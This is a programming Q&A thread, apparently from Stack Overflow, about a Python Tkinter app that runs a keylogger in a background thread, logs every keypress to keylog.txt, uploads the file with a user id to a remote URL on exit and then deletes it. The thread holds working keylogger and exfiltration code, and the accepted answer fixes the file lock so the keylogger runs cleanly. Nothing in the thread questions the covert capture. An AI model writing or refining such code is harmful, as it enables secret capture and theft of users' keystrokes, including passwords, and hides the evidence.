# The process cannot access the file because it is being used by another process: 'keylog.txt'

Tags: python, python-multithreading

I'm trying to build a **Python Tkinter App**

In which i'm using `threading`

**What i want to achieve** - When i'm running the `thread` for a `keylogger code` *Code Below* & the data is being stored in `Keyloge.txt` & when the user exit the app I'm trying to delete this `keylog file`. But the issue is that when i'm trying to delete the `keylog.txt` it can't be deleted because it's being used by the thread in the process

So is there any way i can delete the `keylog.txt` file???

**Threading code**

```
ther = threading.Thread(target=threading12)
ther.daemon = True
stop_threads.start()
```

**Keylogger Code**

```
log = logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")

def on_press(key):
    logging.info(str(key))

def threading12():
    with Listener(on_press=on_press) as listener:
    listener.join()
```

**When Someone exit the app**

```
def on_closing12():
if messagebox.askokcancel("Quit", "Do you want to quit?"):
    date = dt1.today().strftime('%Y-%m-%d')
    if os.path.isfile("keylog.txt"):
        myobj = {'userid': row2,'date': date}
        url = 'https://example.com/getkey'
        with open('keylog.txt', 'rb') as im:
            files = {'file': im}
            r = requests.post(url, files=files, data=myobj)      #sending file to example.com            
        time.sleep(0.4)
        os.remove('keylog.txt')   #<----- removing the file
    time.sleep(0.6)
    root.destroy()
    os._exit(1)


 root.protocol("WM_DELETE_WINDOW", on_closing12)
```

Comment: You're on Windows, right? No other major operating system has this restriction -- on sane, modern systems you're perfectly allowed to unlink an inode from the directory even when it's opened by another process.

Comment: So honestly, unless you _need_ to support users on broken operating systems, I'd just ignore it and document that Windows is unsupported.

Comment: @CharlesDuffy it's on windows

Comment: On Windows you need to open a file with flag FILE_SHARE_DELETE to allow this behaviour. But I don't think it's possible/easy to do this from Python. Otherwise you can try to open file with [O_TEMPORARY|https://docs.python.org/3/library/os.html#os.O_TEMPORARY] flag but you would have to stop using logging framework for the change.

Another alternative, open/close file for every log statement. Since use input should be sparse I think it's viable solution.

Comment: @Hitobat can u please ans with the code for your open/close file solution

Answer (score 0, accepted):

Try open/close the file for every log line?

**KeyLogger**

```py
import time

def on_press(key):
    with open('keylog.txt', 'a') as logfile:
        now = time.asctime()
        log_line = '{} - {}\n'.format(now, str(key))
        logfile.write(log_line)
```